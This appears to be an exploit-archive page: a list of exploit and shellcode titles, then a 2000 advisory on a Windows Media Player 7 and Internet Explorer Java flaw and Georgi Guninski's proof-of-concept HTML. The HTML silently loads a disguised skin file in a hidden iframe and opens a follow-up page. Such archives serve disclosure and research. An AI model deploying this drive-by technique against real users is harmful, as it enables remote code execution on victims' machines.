880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
63 lines
No EOL
2.7 KiB
HTML
63 lines
No EOL
2.7 KiB
HTML
source: https://www.securityfocus.com/bid/2203/info
|
|
|
|
A vulnerability has been reported in Microsoft Windows Media Player 7 which is exploitable through Internet Explorer and Java.
|
|
|
|
Skins are downloadable files which change the appearance of a program's user interface. Skins for Windows Media Player are installed to a known location: "C:/Program files/Windows Media Player/Skins/skin.wmz".
|
|
|
|
As a result, a remote HTML document, visited by the victim user, can lead the user's browser to download an arbitrary file matching the the name 'skin.wmz' to this known location.
|
|
|
|
A malicious remote user could exploit this to upload a file containing executable java code disguised as a Windows Media Player skin file.
|
|
|
|
An applet tag in the remote HTML document can then execute the 'skin.wmz' file as Java code. Properly exploited, this could provide an attacker with complete control of the vulnerable system. On multiuser Windows NT or 2000 systems, this vulnerability can only provide the attacker with access to the system that is within the security context of the user who was exploited.
|
|
|
|
<HTML>
|
|
<HEAD>
|
|
<TITLE>
|
|
Windows Media Player 7 and IE java vulnerability - executing arbitrary programs
|
|
</TITLE>
|
|
</HEAD>
|
|
<BODY>
|
|
<H3>
|
|
Windows Media Player 7 and IE java vulnerability - executing arbitrary programs
|
|
</H3>
|
|
<BR>
|
|
<p>Legal Notice:
|
|
<br>This Advisory and Demonstration is Copyright (c) 2000 Georgi Guninski. You may distribute
|
|
it unmodified. You may not modify it and distribute it or distribute parts
|
|
of it without the author's written permission.
|
|
<p>Disclaimer:
|
|
<br>The opinions expressed in this advisory and program are my own and
|
|
not of any company.
|
|
<br>The usual standard disclaimer applies, especially the fact that Georgi
|
|
Guninski
|
|
<br>is not liable for any damages caused by direct or indirect use
|
|
of the information or functionality provided by this advisory or program.
|
|
<br>Georgi Guninski, bears no responsibility for content or misuse of this
|
|
advisory or program or any derivatives thereof.
|
|
<BR>
|
|
Read the <A HREF="wmp7-3-desc.html">Advisory</A> for more information.
|
|
<BR>
|
|
Wait a few seconds and a window will be opened.
|
|
<BR>
|
|
<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
|
|
<SCRIPT>
|
|
function f()
|
|
{
|
|
window.open("wmp7-3a.html");
|
|
}
|
|
setTimeout("f()",4000);
|
|
</SCRIPT>
|
|
<BR>
|
|
<center>(C) Copyright 2000 Georgi Guninski</center>
|
|
<BR>
|
|
<center>
|
|
| <a href="http://www.guninski.com">Home</a> |
|
|
<a href="browsers.html">Internet Explorer</a> |
|
|
<a href="win2k.html">Windows 2000</a> |
|
|
<a href="exploit.html">AIX</a> |
|
|
<a href="netscape.html">Netscape</a> |
|
|
<a href="greets.html">Greets</a> |
|
|
<a href="index.html">More...</a> |
|
|
</center>
|
|
</BODY>
|
|
</HTML> |